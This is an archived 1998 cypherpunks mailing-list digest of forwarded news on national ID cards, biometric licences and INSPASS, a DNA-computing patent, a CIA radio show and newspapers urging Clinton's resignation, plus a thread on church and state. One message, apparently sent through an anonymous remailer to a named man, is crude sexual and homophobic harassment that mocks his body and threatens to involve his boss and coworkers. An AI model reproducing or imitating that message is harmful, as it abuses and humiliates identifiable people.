       Central Computer and Telecommunications Agency report, Smart cards:
Opportunities for public sector
       applications.

       Response of the Data Protection Registrar to the Government's
proposals for Identity Cards.

       The Green Paper on Identity Cards: A response from the Centre for
Computing and Social Responsibility by
       Simon Rogerson.

       "Identity Crisis: why ID cards are a solution looking for a problem"
by Liz Parratt from Liberty.

       "IDENTITY CARDS: Data protection implications" by Chris Pounder,
Data Protection News (UK).

       State of the Nation articles on national ID cards.

       Social, Legal and Professional Aspects of Computing ID Cards.

       "Britain Discussing National ID Card System", Newsbytes, 03/28/95.


Other Reports and Materials

       "TOUCHING BIG BROTHER: How biometric technology will fuse flesh and
machine" by Simon Davies.

       "Smart Cards: Big Brother's Little Helpers" by The Privacy Committee
of New South Wales, Australia.

       Chip-Based ID: Promise and Peril by Rober Clarke, Australian
National Univeristy.

       Human Identification in Information Systems: Management Challenges
and Public Policy Issues by Roger
       Clarke.

       Identification, Anonymity and Pseudonymity in Consumer Transactions:
A Vital Systems Design and Public
       Policy Issue by Roger Clarke.

       1991 Hungarian Supreme Court decision stricking down use of ID numbers.

       Smart Card Magazine, The Birth of Smart Cards: 1980.

       Electronic Privacy Information Center's pages on current national ID
card proposals in the United States.

News Stories

       TORONTO STAR, February 9th, 1996; Lead Editorial: HARRIS SHOULD
SCRAP UNIVERSAL ID
       CARD.

       `Smart cards' will soon be approved, says health policy committee by
chairperson by TOM ARNOLD, The
       Edmonton Journal.

       Canadian Privacy boss raps ID cards, The Canadian Press, July 15, 1995.

       Privacy commissioner in the dark about ID cards: Wants controls put
on access, The Vancouver Province,
       September 27, 1995.

       AsiaWeek, ID Cards Introduced in Philippines.

       Greece to Demand Religion on National ID Cards, 2 May 1993.

       Unisys press release on Spain national ID card project.




Return to Privacy International's Home Page

Last updated July 16, 1997.



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 01:57:06 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: (Fwd) Radio Show on CIA
Message-ID: <199809160658.XAA22988@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Steve Wingate" <stevew@world.std.com>
Subject: SNET: (Fwd) Radio Show on CIA
Date: Mon, 14 Sep 1998 19:28:26 -0700
To: "CIA.DRUGS" <CIA.DRUGS@listbot.com>, SNETNEWS <snetnews@world.std.com>, CTRL@LISTSERV.AOL.COM


->  SNETNEWS  Mailing List

------- Forwarded Message Follows -------
From:          Expert53@aol.com
Date:          Mon, 14 Sep 1998 14:44:04 EDT
Subject:       Radio Show on CIA

THE EXPERT WITNESS RADIO SHOW
WBAI  New York City
99.5  FM
Expert53@aol.co
 212-209-2800 (voice mail #2970)

Host: Michael Levine, 25 Year veteran federal agent and author of NY Times
bestseller "DEEP COVER" - (just optioned for movie) "THE BIG WHITE LIE" -The
fact-based thriller (now in paperback), THE TRIANGLE OF DEATH, based on
actual, never-before-revealed events from CIA's hunt for mind control drugs  

WEB SITES:

http://www.radio4all.org/expert - Past  radio shows may be downloaded free of
charge; includes books, photos and opinion articles. 

http://www.universalprosthesis.com/news/expert.html  -  includes the ability
to order tapes of the old shows, at cost, $8 per show.

FIGHT BACK ANTI-DRUG PROGRAM:
http://idt.net/~dorisaw

 TUESDAY EVENING, 7-8pm, Septeber 15, 1998,  on WBAI, 99.5 FM in NYC, the
Expert Witness Radio Show will feature a discussion with journalists Alexander
Cockburn and Jeffrey St. Clair about their recent book "WHITEOUT"-a powerful
and well documented analysis of CIA's manipulation of mainstream media to
cover up massive "Three Stooges" ineptitude and criminality.
 The show will be rebroadcast a week later on the Roy Tuckan Show, KPFK, Los
Angeles, CA, and then archived on the above listed web sites.

-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: "Steve Wingate" <stevew@world.std.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 01:57:30 +0800
To: cypherpunks@cyberpass.net
Subject: IP: DNA-Powered Computers: Patent Received
Message-ID: <199809160658.XAA23001@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: DNA-Powered Computers: Patent Received
Date: Mon, 14 Sep 1998 10:31:49 -0500
To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/yr/mo/day/news/financial/patents.html

September 14, 1998

PATENTS

Solve Computer Problems With DNA

By TERESA RIORDAN

Four years ago, Dr. Leonard Adleman raised the exciting possibility of
DNA-powered supercomputers when he wrote in the journal Science that he had
solved a computational problem essentially by stirring up some DNA in a
test tube, using building blocks of DNA as computing symbols. 

The technique, in concept, involves the use of DNA -- strands of genetic
code -- as a stand-in for computer software code. 

Adleman, a professor at the University of Southern California, set up his
problem by synthesizing DNA in a certain sequence and then letting DNA
molecules react in a test tube so they ultimately produce a molecule
whose sequence is the answer to the problem. 

He used the chemical units of DNA rather than electronic 1s and 0s to solve
a single, relatively simple problem: figuring out the shortest distance
someone would have to travel to visit a number of different cities --
similar to a standard math problem referred to as the "traveling salesman
tour problem." 

But last week Dr. Warren Smith and Dr. Allan Schweitzer, two scientists at
the NEC Research Institute in Princeton, N.J., received what appears to be
the first patent covering a DNA computing process that at least
theoretically can solve not just a single problem but a broad array of
problems, just as a conventional desktop computer might. 

The patent describes a way to concoct a vat of DNA molecules that have been
manipulated by standard biotechnology techniques -- such as the cutting,
splicing and growing of DNA strands -- to behave like
miniature computers.  

All these molecular-size computers would operate in parallel, with each one
exploring different possible computational paths to solve a problem,
potentially speeding up computing time greatly. 

The patent details a way to use genetic material to construct a large
number of what are called Turing machines, all running in parallel, with
each exploring different possible computational paths. (A Turing machine is
a theoretical construct, first proposed in 1937 by the British computer
scientist Alan Turing, that provides the schematic outline upon which
digital computers are based.) 

Despite the new patent, Smith does not sound optimistic these days about
the patented technique. 

"Some of the DNA molecules do the right step," he said in an interview,
describing the process. "But then some other fraction just dissolve and get
flushed down the drain." 

This and other problems lead to an exponential buildup in errors during the
calculations. In addition, the operations of this DNA computing so far are
slow-going, taking hours. 

"This does appear to be the first patent to issue in this area," said David
Waltz, an NEC vice president. "But will this be the basis of a new
industry, and will everyone have to take out a license on it in the future?
That's not so clear." 

Smith and Schweitzer received patent number 5,804,373. 

Patents are available by number for $3 from the Patent and Trademark
Office, Washington, D.C. 20231. 

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 02:14:55 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: [FP] FW: Arkansas: Digital/Biometric Drivers License System
Message-ID: <199809160716.AAA24458@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net> (by way of jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))
Subject: SNET: [FP] FW: Arkansas: Digital/Biometric Drivers License System
Date: Wed, 16 Sep 1998 15:01:36 +1200
To: snetnews@world.std.com


->  SNETNEWS  Mailing List

[forwarded message]

Source:  PR Newswire
http://www.prnewswire.com

Viisage Technology, Inc. to Provide Statewide Digital Drivers License
System In Arkansas

    LITTLETON, Mass., Sept. 14 /PRNewswire/ -- Viisage Technology, Inc.
(Nasdaq: VISG), a leader in the emerging field of biometrics technology and
in providing digital identification systems and solutions, has been awarded
a $10.4 million contract by the State of Arkansas to provide a new digital
drivers license system with 158 locations across the State.

    Mike Munns, Arkansas Administrator of Driver Services, said, "We
conducted a comprehensive process to identify the best system value for
Arkansas drivers while seeking to improve the quality of service in our
offices and obtain the best technology available.  Viisage not only met
these requirements, they also demonstrated an understanding of our needs
and a commitment to be a true partner in this important project."

    Tom Colatosti, Viisage Vice President and COO, said, "We are pleased
about the opportunity to partner with the Arkansas Office of Driver
Services to provide Arkansas drivers with leadership technology and the
most secure licenses available.  The Arkansas contract will be managed by
the company's systems integration and identification card division that was
established in May 1998 when the company reorganized to create separate
systems integration and biometrics divisions.  This contract increases the
company's market share in the drivers license business and will contribute
to the growth and profitability of the systems integration and
identification card division."

    Bob Hughes, Viisage President and CEO, said, "The biometrics division
will continue to raise capital and invest profits, as needed, to develop
its unique facial recognition technology and products.  These products will
be sold through channels, including the company's systems integration
division, for identification, verification, security and other biometric
applications. Biometrics technology and, in particular, Viisage's facial
recognition technology are receiving intense interest from many market
segments.  Viisage seeks to achieve long term growth and profitability by
penetrating these new markets and developing products to meet market needs."

    With the Arkansas contract, Viisage systems provide more than 100
million digital identification cards under contracts for drivers license
programs in Arizona, Florida, Illinois, Massachusetts, New Mexico, North
Carolina, Ohio and Wisconsin, and for social services programs in
Connecticut, Massachusetts and New York.  Other Viisage projects include
voter registration programs in Jamaica and the Philippines and programs
with the Ohio Department of Corrections and the U.S. Department of
Treasury's Immigration and Naturalization Service.  Viisage also has
the world's largest facial recognition database with projects in
Massachusetts and Illinois.

    Viisage is a leading provider of digital identification systems and
solutions intended to improve personal convenience and security, deter
fraud and reduce identification program costs.  The company combines its
systems integration and software design capabilities with its proprietary
software and hardware products to create custom solutions in a wide range
of applications that can include national ID's, drivers licenses, law
enforcement, voter registration, social services, access control and
information, healthcare, financial services and retail. Viisage has also
devoted significant resources to become a leader in the emerging field
of biometrics with particular emphasis on patented facial recognition
technology for real-time and large database identification and verification
of individuals.  Viisage can be found on the World Wide Web at
http://www.viisage.com.

    This news release may contain forward-looking statements that involve
risks and uncertainties.  Forward-looking statements in this document and
those made from time to time by the Company through its senior management
are made pursuant to the safe harbor provisions of the Private Securities
Litigation Reform Act of 1995.  Forward-looking statements concerning
future plans or results are necessarily only estimates and actual results
could differ materially from expectations.  Certain factors that could
cause or contribute to such differences include, among other things,
potential fluctuations in quarterly results, the size and timing of award
and performance on contracts, dependence on large contracts and a limited
number of customers, lengthy sales and implementation cycles, changes in
management estimates incident to accounting for contracts, availability and
cost of key components, market acceptance of new or enhanced products and
services, proprietary technology and changing technology, competitive
conditions, system performance, management of growth, dependence on key
personnel and general economic and political conditions and other factors
affecting spending by customers.

SOURCE Viisage Technology, Inc.
Web Site: http://www.viisage.com

(c)1998 PR Newswire.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------

-----Original Message-----
From: believer@telepath.com [mailto:believer@telepath.com]
Sent: Tuesday, September 15, 1998 9:51 AM
To: believer@telepath.com
Subject: Arkansas: Digital/Biometric Drivers License System



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: "ScanThisNews" <mcdonalds@airnet.net> (by way of jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 02:14:46 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: [FP] FW: Want to Travel? Not W/O Your Biometric Passport
Message-ID: <199809160716.AAA24468@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net> (by way of jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))
Subject: SNET: [FP] FW: Want to Travel? Not W/O Your Biometric Passport
Date: Wed, 16 Sep 1998 15:01:38 +1200
To: snetnews@world.std.com


->  SNETNEWS  Mailing List

======================================================================
SCAN THIS NEWS
9/15/98

[forwarded message]

US Takes Immigration in Hand
by Theta Pavis

http://www.wired.com/news/news/technology/story/15014.html

Sep 15, 1998

It's been 44 years since Ellis Island closed shop, but immigration
can still be a long, tiresome process. In an effort to speed the
process for international travelers, the US Immigration and
Naturalization Service is offering a biometric system for willing
frequent flyers.

So far, 71,000 people in six airports have signed up for the
system, called INSPASS. It employs a biometric kiosk to scan and
match the geometric dimensions of travelers' hands, verify their
identities, and perform standard background checks. The INS plans
to expand the program to four additional airports by the end of the
year.

"It creates a fast lane for people," said James Wayman, head of the
federally funded National Biometric Test Center at San Jose
State University.

The kiosks were integrated by EDS, which has had a US$300 million
contract with the INS for automation support and software
development since 1994. This summer, the INS awarded a new,
five-year information-technology contract worth $750 million
to EDS and four other companies.

Ann Cohen, an EDS vice president in the government services group,
said the fact that so many people have signed up for the
INSPASS system shows that biometrics are becoming more popular
and could be commonplace in the future.

"Were getting over that 'Big Brother' hurdle," Cohen said. As
e-commerce develops and terrorism grows, biometrics increasingly
are the "only sure way to get security."

US and Canadian citizens flying overseas on business at least three
times a year are eligible for the free INSPASS program. People
from Bermuda and 26 other countries that have visa-waiver agreements
with the United States are also eligible.

The INSPASS kiosks, which look like ATM machines, were recently
installed at the Los Angeles International Airport, where more
than 1,000 people have enrolled in the program. Rico Cabrera, a
spokesman with the INS Los Angeles regional office, said travelers
like the fact that INSPASS can check their identity in 16 to 60
seconds, a process that can take up to three hours at some airports.
The largest group of INSPASS users at LAX are US citizens, followed by
Australians and New Zealanders.

After filling out a one-page form and passing a background check,
travelers can be issued a Port Pass card with their picture and a
12-number ID on it.

A traveler inserts the card in the kiosk, which reads the ID
number and links to a centralized database run by US Customs. A
geometric hand template is called up from the database and
transferred to the kiosk. After a green light flashes, the right
hand is placed on a reflective surface -- the ID-3D Handkey,
made by Recognition Systems. The HandKey uses a video camera to
take a geometric image of the traveler's hand and fingers, and
the data is converted using compression algorithms. If it matches
the template of the hand stored in the database, the traveler is in.

INSPASS kiosks are also in use at airports in Newark, Miami,
Kennedy (New York), Pearson (Toronto), and Vancouver, British
Columbia. The INS eventually plans to install them at most busy
international airports around the country, including Washington,
San Francisco, Seattle, and Honolulu. The department has geared
the programtoward business travelers, diplomats, airline personnel,
and other "low-risk" visitors.

Some argue that the INS hasn't done enough to market the program.
Jeffrey Betts, WorldWide Solution Manager for IBM -- which
has developed FastGate, a kiosk similar to INSPASS -- said people
aren't enrolling fast enough in the INS system.

International arrivals at airports across the globe are growing every
year by 7 to 10 percent, Betts said, but border control resources
are flat or declining. In 1996, some 65,000 people were enrolled
in the INSPASS program, but the program has added just 6,000 new
users since then.

IBM, which has been running a small pilot program of FastGate in
Bermuda for the past year, is building a system where people can
swipe a credit card through a kiosk at the airport and connect with
a database where the biometrics are stored.

"Governments will have to find ways to do more with less or force
travelers to queue like cattle," Betts said.

While the government plans on marketing INSPASS more aggressively
in the future, Schmidt said, INS is counting on word of mouth
to get new people enrolled. "We don't really have the budget for
a huge marketing campaign," she said.

-----Original Message-----
From: Patrick Poole [mailto:ppoole@fcref.org]
Sent: Tuesday, September 15, 1998 5:09 PM
Subject: Want to Travel? Not W/O Your Biometric Passport

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: "ScanThisNews" <mcdonalds@airnet.net> (by way of jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 02:14:57 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [Fwd: Newspapers that have called for President Clinton'sresignation.]
Message-ID: <199809160716.AAA24479@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: jlbtexas <jlbtexas@swbell.net>
Subject: IP: [Fwd: Newspapers that have called for President Clinton'sresignation.]
Date: Tue, 15 Sep 1998 19:22:09 -0500
To: Ignition Point <Ignition-Point@majordomo.pobox.com>

This is a multi-part message in MIME format.
--------------748814E7F8CA61AC43FE785D
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit



--------------748814E7F8CA61AC43FE785D
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Return-Path: <spiker@amnix.com>
Received: from mail-gw1adm.rcsntx.swbell.net (mail-gw1adm.rcsntx.swbell.net [151.164.60.101])
	by mail1.rcsntx.swbell.net (8.8.5/8.8.5) with ESMTP id TAA04511;
	Tue, 15 Sep 1998 19:23:25 -0500 (CDT)
Received: from smokies.amnix.com (smokies.amnix.com [207.174.29.6])
	by mail-gw1adm.rcsntx.swbell.net (8.8.5/8.8.5) with ESMTP id TAA08204;
	Tue, 15 Sep 1998 19:23:24 -0500 (CDT)
Received: from x (ppp-15.dialup2.den.amnix.com [207.174.29.147])
	by smokies.amnix.com (8.8.8/8.8.8) with SMTP id SAA06718;
	Tue, 15 Sep 1998 18:09:30 -0600 (MDT)
	(envelope-from spiker@amnix.com)
Message-Id: <4.0.1.19980915180207.0115aa20@amnix.com>
X-Sender: spiker@amnix.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.1 
Date: Tue, 15 Sep 1998 18:18:49 -0600
To: repub-d@u.washington.edu (New Republican Discussion List)
From: spiker <spiker@amnix.com>
Subject: Newspapers that have called for President Clinton's
  resignation.
Mime-Version: 1.0
Content-Type: multipart/alternative;
	types="text/plain,text/html";
	boundary="=====================_41497386==_.ALT"

--=====================_41497386==_.ALT
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Newspapers that have called for President Clinton's resignation.

AP
Sept. 15=20

(AP) =97 Newspapers that have called for President Clinton's resignation.
Some of
those listed did so before the release of Kenneth Starr's report on Sept.=
 11.=20



NATIONAL:=20

USA Today=20



ALABAMA:=20

The Dothan Eagle=20

The Mobile Register=20

Montgomery Advertiser=20



ARIZONA:=20

The Daily Dispatch of Douglas=20



CALIFORNIA:=20

San Jose Mercury News=20



COLORADO:=20

The Denver Post=20



CONNECTICUT:=20

The Day of New London=20

Norwich Bulletin=20



FLORIDA:=20

Tampa Tribune=20



GEORGIA:=20

The Atlanta Journal-Constitution=20

The Augusta Chronicle.=20

The Daily Citizen-News, Dalton=20



ILLINOIS:=20

Chicago Tribune=20



INDIANA:=20

The Indianapolis Star=20

The Reporter of Lebanon=20

Chronicle-Tribune of Marion=20



IOWA:=20

The Des Moines Register=20



LOUISIANA:=20

The Times-Picayune of New Orleans=20



MICHIGAN:=20

The Grand Rapids Press=20



MINNESOTA:=20

Post-Bulletin of Rochester=20



MISSISSIPPI:=20

Northeast Mississippi Daily Journal, Tupelo=20



NEBRASKA:=20

Lincoln Journal Star=20



NEVADA:=20

Reno Gazette-Journal=20



NEW MEXICO:=20

Albuquerque Journal=20



NEW YORK:=20

Sunday Freeman of Kingston=20

Utica Observer-Dispatch=20



NORTH CAROLINA:=20

The Herald-Sun of Durham=20

Winston-Salem Journal=20



OHIO:=20

The Repository, Canton=20

The Cincinnati Enquirer=20

The News-Messenger, Fremont=20

News Journal, Mansfield=20

News-Herald, Port Clinton=20



OKLAHOMA:=20

Tulsa World=20



OREGON:=20

Statesman Journal, Salem=20



PENNSYLVANIA:=20

The Sentinel, Carlisle=20

The Daily Intelligencer, Doylestown=20

Standard-Speaker, Hazleton=20

The Philadelphia Inquirer=20

The Pittsburgh Post-Gazette=20

Daily American, Somerset=20



SOUTH CAROLINA:=20

The State, Columbia=20



SOUTH DAKOTA:=20

Argus Leader, Sioux Falls=20



TENNESSEE:=20

The Knoxville News-Sentinel=20

The Commercial Appeal, Memphis=20



TEXAS:=20

The Facts of Brazoria County=20

San Antonio Express-News=20

Tyler Morning Telegraph=20



UTAH:=20

Standard-Examiner, Ogden=20

The Spectrum, St. George=20

The Salt Lake City Tribune=20



WASHINGTON:=20

The Seattle Times=20



WISCONSIN:=20

The Post-Crescent, Appleton=20

The Journal Times, Racine=20


--=====================_41497386==_.ALT
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html>
<font size=3D3>Newspapers that have called for President Clinton's
resignation.<br>
<br>
AP<br>
Sept. 15 <br>
<br>
(AP) =97 Newspapers that have called for President Clinton's resignation.
Some of those listed did so before the release of Kenneth Starr's report
on Sept. 11. <br>
<br>
<br>
<br>
NATIONAL: <br>
<br>
USA Today <br>
<br>
<br>
<br>
ALABAMA: <br>
<br>
The Dothan Eagle <br>
<br>
The Mobile Register <br>
<br>
Montgomery Advertiser <br>
<br>
<br>
<br>
ARIZONA: <br>
<br>
The Daily Dispatch of Douglas <br>
<br>
<br>
<br>
CALIFORNIA: <br>
<br>
San Jose Mercury News <br>
<br>
<br>
<br>
COLORADO: <br>
<br>
The Denver Post <br>
<br>
<br>
<br>
CONNECTICUT: <br>
<br>
The Day of New London <br>
<br>
Norwich Bulletin <br>
<br>
<br>
<br>
FLORIDA: <br>
<br>
Tampa Tribune <br>
<br>
<br>
<br>
GEORGIA: <br>
<br>
The Atlanta Journal-Constitution <br>
<br>
The Augusta Chronicle. <br>
<br>
The Daily Citizen-News, Dalton <br>
<br>
<br>
<br>
ILLINOIS: <br>
<br>
Chicago Tribune <br>
<br>
<br>
<br>
INDIANA: <br>
<br>
The Indianapolis Star <br>
<br>
The Reporter of Lebanon <br>
<br>
Chronicle-Tribune of Marion <br>
<br>
<br>
<br>
IOWA: <br>
<br>
The Des Moines Register <br>
<br>
<br>
<br>
LOUISIANA: <br>
<br>
The Times-Picayune of New Orleans <br>
<br>
<br>
<br>
MICHIGAN: <br>
<br>
The Grand Rapids Press <br>
<br>
<br>
<br>
MINNESOTA: <br>
<br>
Post-Bulletin of Rochester <br>
<br>
<br>
<br>
MISSISSIPPI: <br>
<br>
Northeast Mississippi Daily Journal, Tupelo <br>
<br>
<br>
<br>
NEBRASKA: <br>
<br>
Lincoln Journal Star <br>
<br>
<br>
<br>
NEVADA: <br>
<br>
Reno Gazette-Journal <br>
<br>
<br>
<br>
NEW MEXICO: <br>
<br>
Albuquerque Journal <br>
<br>
<br>
<br>
NEW YORK: <br>
<br>
Sunday Freeman of Kingston <br>
<br>
Utica Observer-Dispatch <br>
<br>
<br>
<br>
NORTH CAROLINA: <br>
<br>
The Herald-Sun of Durham <br>
<br>
Winston-Salem Journal <br>
<br>
<br>
<br>
OHIO: <br>
<br>
The Repository, Canton <br>
<br>
The Cincinnati Enquirer <br>
<br>
The News-Messenger, Fremont <br>
<br>
News Journal, Mansfield <br>
<br>
News-Herald, Port Clinton <br>
<br>
<br>
<br>
OKLAHOMA: <br>
<br>
Tulsa World <br>
<br>
<br>
<br>
OREGON: <br>
<br>
Statesman Journal, Salem <br>
<br>
<br>
<br>
PENNSYLVANIA: <br>
<br>
The Sentinel, Carlisle <br>
<br>
The Daily Intelligencer, Doylestown <br>
<br>
Standard-Speaker, Hazleton <br>
<br>
The Philadelphia Inquirer <br>
<br>
The Pittsburgh Post-Gazette <br>
<br>
Daily American, Somerset <br>
<br>
<br>
<br>
SOUTH CAROLINA: <br>
<br>
The State, Columbia <br>
<br>
<br>
<br>
SOUTH DAKOTA: <br>
<br>
Argus Leader, Sioux Falls <br>
<br>
<br>
<br>
TENNESSEE: <br>
<br>
The Knoxville News-Sentinel <br>
<br>
The Commercial Appeal, Memphis <br>
<br>
<br>
<br>
TEXAS: <br>
<br>
The Facts of Brazoria County <br>
<br>
San Antonio Express-News <br>
<br>
Tyler Morning Telegraph <br>
<br>
<br>
<br>
UTAH: <br>
<br>
Standard-Examiner, Ogden <br>
<br>
The Spectrum, St. George <br>
<br>
The Salt Lake City Tribune <br>
<br>
<br>
<br>
WASHINGTON: <br>
<br>
The Seattle Times <br>
<br>
<br>
<br>
WISCONSIN: <br>
<br>
The Post-Crescent, Appleton <br>
<br>
The Journal Times, Racine <br>
</font><br>
</html>

--=====================_41497386==_.ALT--


--------------748814E7F8CA61AC43FE785D--




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Tue, 15 Sep 1998 19:26:24 +0800
To: james.talkington@srcm.com
Subject: Re: Hello
Message-ID: <cf9e329a46bf03db136b0f6d82f0f7a2@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Sep 1998, Christopher Barkley <christopher.barkley@srcm.com>
wrote:

>
> You listed me in Six Degrees as your fellow alum, but I'm afraid I can't
> place you.  So, who are you?
>
> Cheers,
> Christopher

Hi!

I found you on a gay sex site. Boy, do you have a little one, dude. But I
was thinking maybe we could get together and get some drinks and dinner,
maybe take in a XXX movie, and then go at it with these five other guys I
found.  We can take films and give them to the web site owners at Six
Degrees.  They tell me they pay really good for it. They pay extra for
S&M-bondage-anal films. We can split it and hired a few hundred male
prostitutes and have the biggest orgy in history.

I wanna like get your boss in on it too.....nothing like a master-slave
relationship to make your heart skip a few beats. Purrrrrrrrrrrr. You guys
must have a real good time in the office.

Feel free to post this on the bulletin board and all. Since you mailed me
I feel compelled to give a big steamy hunk like you all my special offers
and anyBODY who works with you is probably just as much of a beefcake.

Make sure you wear lots of black leather. I'll bring the whip. 

Ta ta, you big luscious hunk you!

Love,
Fudgepacker Supreme




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Sep 1998 23:56:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Democracy... (fwd)
Message-ID: <199809160522.AAA03680@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 15 Sep 1998 23:09:03 -0500
> From: Jaeger <Jaeger@hempseed.com>
> Subject: Re: Democracy...

> and the meaning is not that church
> shouldn't have an effect on the state.

Agreed.

  The state CAN support one
> religion over another.

If we are speaking of 'the state' as the 'federal government' then *no* it
can't support any religion because it isn't authorized to address those
issues under any venue, make no law means just that, make no law - whether
for or against religion is irrelevant. This country is blind in respect to
religion and the cornucopia of individual actions via the 9th & 10th.

Now if you are speaking of 'the state' as the individual 50 states,
regulated within the confines of their own 50 individual constitutions, as
directed per the 10th then you are correct - provided the state constitution
gives the state government the duty (governments don't have rights) to regulate
religion, the fact is most don't.

If there is no individual state regulation then the limitations of religion
fall upon individual discretion. Whether the religion promoted going to
heaven, smoking good ganja, or rapeing babies is irrelevant as to the
ability of the state to engage in prior restraint - they can't. Since most
local jurisdictions have laws against murder, rape, child molestation, etc.
under their individual charters and representative system there is really no
reason to a priori regulate such activities at any higher level than localy.
It isn't the act that we should worry about, it's the consequences to others
after the fact. If an act doesn't effect another person or their property
directly then there is no legitimate reason to interfere with their actions.

Constitutionaly the federal government should be blind to my actions as an
individual unless I'm crossing a state line, work for the federal
government, legal action, or have a treasury issue.

>  In context, the phrase simply explains that the
> government can't make laws that RESTRICT religious practice or doctrinal
> issues.

Bullshit. There is NO way to reasonably accept this as a legitimate
interpretation of the 1st & 10th.

>  The state CAN make laws that encourage the practice of any one
> particular religion, as long as the laws do not RESTRICT the PRACTICE of
> other religions.  Making people uncomfortable isn't a constitutional
> reason to overturn a law.

No. Niether the spirit or the letter of the issue allows such sweeping
generalizations. In fact it fails for the same reason that mass searches
fail strict Constitutional interpretation, the Constitution directs that
probable cause is required *IN EACH CASE* to be handled individualy, there
is no stipulation where individual probable cause may be bypassed. Just
because you do it to everyone, while you can't do it to anyone, legitimizes
it. If you can't rape an individual you can't rape 10 people. The same
applies to religion, the federal government can't make a law respecting a
religion because it can't even define religion. Now if you can't support any
religion you certainly can't support an individual religion.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vivek Vaidya" <phirebearer@hotmail.com>
Date: Wed, 16 Sep 1998 02:32:54 +0800
To: cypherpunks@toad.com
Subject: Re: Democracy...
Message-ID: <19980916072612.3520.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



>At Tuesday, you wrote:
>>> 1)Love the Lord, with all your heart, with all you soul with all 
your 
>>> mind and all your strength
>>> 2)Love you neibour as yourself.
>>>
>>> Everything else hangs on these.
>>>
>>Ever heard of seperation of church and state? Democracy? the rights 
>>of the individual?  While you certainly have the right to practice 
>>your religion in what ever manner you so choose demanding that 
>>everyone else does, or that the president of the us of ais subject 
>>to you PERSONAL faith decisions is outragous
>
>I believe you are confusing church with religion.
>Religion has nothing to do with Churches and the dogmas they follow.
>Like Ethics have nothing to do with Law.
>
>The reference made is more related with ethics than with religion 
>(even if a reference to God is made) and certainly no related at all
>with any Church. 
>
